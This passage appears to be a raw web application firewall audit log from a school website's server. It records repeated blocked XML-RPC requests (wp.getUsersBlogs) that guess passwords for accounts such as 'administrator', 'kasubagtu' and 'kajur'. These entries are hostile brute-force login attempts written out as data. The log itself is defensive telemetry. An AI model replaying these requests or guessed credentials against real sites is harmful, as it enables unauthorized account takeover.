+0700] Z_8yB0-sESiKFppgz04cNAAAANU 103.236.140.4 37762 103.236.140.4 8181 --6e296762-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6e296762-C-- wp.getUsersBlogs kasubagtu kasubagtu@1987 --6e296762-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e296762-E-- --6e296762-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (151+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777735355843 5203 (- - -) Stopwatch2: 1744777735355843 5203; combined=4033, p1=465, p2=3354, p3=0, p4=0, p5=122, sr=88, sw=92, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e296762-Z-- --99440e7e-A-- [16/Apr/2025:11:29:55 +0700] Z_8yQ0-sESiKFppgz04cbgAAANU 103.236.140.4 38298 103.236.140.4 8181 --99440e7e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --99440e7e-C-- wp.getUsersBlogs kasubagtu 888 --99440e7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --99440e7e-E-- --99440e7e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (153+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777795065801 4478 (- - -) Stopwatch2: 1744777795065801 4478; combined=3335, p1=350, p2=2795, p3=0, p4=0, p5=108, sr=81, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99440e7e-Z-- --a043771d-A-- [16/Apr/2025:11:30:55 +0700] Z_8yf0-sESiKFppgz04c9QAAANA 103.236.140.4 38594 103.236.140.4 8181 --a043771d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a043771d-C-- wp.getUsersBlogs kasubagtu asdf --a043771d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a043771d-E-- --a043771d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (142+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777855374686 4308 (- - -) Stopwatch2: 1744777855374686 4308; combined=3284, p1=364, p2=2740, p3=0, p4=0, p5=104, sr=82, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a043771d-Z-- --f4616501-A-- [16/Apr/2025:11:31:31 +0700] Z_8yo0-sESiKFppgz04dDwAAAM8 103.236.140.4 38778 103.236.140.4 8181 --f4616501-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f4616501-C-- wp.getUsersBlogs kasubagtu 1234%^&* --f4616501-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4616501-E-- --f4616501-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777891578712 6189 (- - -) Stopwatch2: 1744777891578712 6189; combined=4294, p1=562, p2=3564, p3=0, p4=0, p5=102, sr=101, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4616501-Z-- --565f4870-A-- [16/Apr/2025:11:31:55 +0700] Z_8yuype92T0H9-Aa0y87gAAAEU 103.236.140.4 38888 103.236.140.4 8181 --565f4870-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --565f4870-C-- wp.getUsersBlogs kasubagtu Aa123456. --565f4870-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --565f4870-E-- --565f4870-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (146+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777915309187 4118 (- - -) Stopwatch2: 1744777915309187 4118; combined=3210, p1=377, p2=2669, p3=0, p4=0, p5=96, sr=79, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --565f4870-Z-- --7fc22051-A-- [16/Apr/2025:11:32:55 +0700] Z_8y95VnVduWmh0dMDMWpwAAAIA 103.236.140.4 39206 103.236.140.4 8181 --7fc22051-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7fc22051-C-- wp.getUsersBlogs kasubagtu evite --7fc22051-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7fc22051-E-- --7fc22051-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (157+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777975758752 4138 (- - -) Stopwatch2: 1744777975758752 4138; combined=3160, p1=346, p2=2649, p3=0, p4=0, p5=96, sr=79, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7fc22051-Z-- --d4c1ab52-A-- [16/Apr/2025:11:33:55 +0700] Z_8zM0-sESiKFppgz04dLwAAANc 103.236.140.4 39510 103.236.140.4 8181 --d4c1ab52-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d4c1ab52-C-- wp.getUsersBlogs kasubagtu manunited --d4c1ab52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4c1ab52-E-- --d4c1ab52-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (151+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778035870760 4230 (- - -) Stopwatch2: 1744778035870760 4230; combined=3239, p1=346, p2=2728, p3=0, p4=0, p5=96, sr=80, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4c1ab52-Z-- --010cac48-A-- [16/Apr/2025:11:34:55 +0700] Z_8zb0-sESiKFppgz04dtAAAAM4 103.236.140.4 39802 103.236.140.4 8181 --010cac48-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 236 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --010cac48-C-- wp.getUsersBlogs administrator administrator1986 --010cac48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --010cac48-E-- --010cac48-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (144+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778095180573 4195 (- - -) Stopwatch2: 1744778095180573 4195; combined=3222, p1=340, p2=2715, p3=0, p4=0, p5=97, sr=82, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --010cac48-Z-- --ccde9100-A-- [16/Apr/2025:11:35:55 +0700] Z_8zqxk9XPLR9cFiTEvD2AAAAAI 103.236.140.4 40080 103.236.140.4 8181 --ccde9100-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ccde9100-C-- wp.getUsersBlogs administrator Marketing_ --ccde9100-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ccde9100-E-- --ccde9100-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (138+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778155241224 4341 (- - -) Stopwatch2: 1744778155241224 4341; combined=3318, p1=351, p2=2804, p3=0, p4=0, p5=95, sr=80, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ccde9100-Z-- --2a390d2a-A-- [16/Apr/2025:11:36:55 +0700] Z_8z50-sESiKFppgz04ejgAAAM4 103.236.140.4 40364 103.236.140.4 8181 --2a390d2a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2a390d2a-C-- wp.getUsersBlogs administrator 1201230 --2a390d2a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a390d2a-E-- --2a390d2a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (141+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778215356559 4090 (- - -) Stopwatch2: 1744778215356559 4090; combined=3149, p1=338, p2=2647, p3=0, p4=0, p5=95, sr=77, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a390d2a-Z-- --800cfa78-A-- [16/Apr/2025:11:37:55 +0700] Z_80I5VnVduWmh0dMDMXUwAAAIQ 103.236.140.4 40648 103.236.140.4 8181 --800cfa78-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 230 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --800cfa78-C-- wp.getUsersBlogs administrator 12345678910 --800cfa78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --800cfa78-E-- --800cfa78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (138+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778275098690 4104 (- - -) Stopwatch2: 1744778275098690 4104; combined=3161, p1=338, p2=2657, p3=0, p4=0, p5=96, sr=79, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --800cfa78-Z-- --c301395f-A-- [16/Apr/2025:11:38:31 +0700] Z_80R5VnVduWmh0dMDMXfQAAAIA 103.236.140.4 40814 103.236.140.4 8181 --c301395f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c301395f-C-- wp.getUsersBlogs administrator 1234%^&* --c301395f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c301395f-E-- --c301395f-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778311247540 4318 (- - -) Stopwatch2: 1744778311247540 4318; combined=3307, p1=345, p2=2796, p3=0, p4=0, p5=98, sr=78, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c301395f-Z-- --69e8a92d-A-- [16/Apr/2025:11:38:55 +0700] Z_80X5VnVduWmh0dMDMXnAAAAIs 103.236.140.4 40934 103.236.140.4 8181 --69e8a92d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --69e8a92d-C-- wp.getUsersBlogs administrator whatever --69e8a92d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69e8a92d-E-- --69e8a92d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (136+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778335122494 16420 (- - -) Stopwatch2: 1744778335122494 16420; combined=27582, p1=357, p2=2708, p3=0, p4=0, p5=12272, sr=80, sw=69, l=0, gc=12176 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69e8a92d-Z-- --97966408-A-- [16/Apr/2025:11:39:55 +0700] Z_80m5VnVduWmh0dMDMX4wAAAI0 103.236.140.4 41222 103.236.140.4 8181 --97966408-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --97966408-C-- wp.getUsersBlogs administrator senha --97966408-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97966408-E-- --97966408-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (141+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778395452429 4417 (- - -) Stopwatch2: 1744778395452429 4417; combined=3364, p1=356, p2=2846, p3=0, p4=0, p5=94, sr=81, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97966408-Z-- --0cf6c574-A-- [16/Apr/2025:11:40:55 +0700] Z_801xk9XPLR9cFiTEvEiwAAABA 103.236.140.4 41472 103.236.140.4 8181 --0cf6c574-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0cf6c574-C-- wp.getUsersBlogs administrator martin --0cf6c574-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0cf6c574-E-- --0cf6c574-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (124+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778455602389 4391 (- - -) Stopwatch2: 1744778455602389 4391; combined=3303, p1=340, p2=2795, p3=0, p4=0, p5=98, sr=79, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0cf6c574-Z-- --5cfad657-A-- [16/Apr/2025:11:41:55 +0700] Z_81Exk9XPLR9cFiTEvFFAAAAAk 103.236.140.4 41758 103.236.140.4 8181 --5cfad657-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5cfad657-C-- wp.getUsersBlogs kajur Pakarmy@0882 --5cfad657-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5cfad657-E-- --5cfad657-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
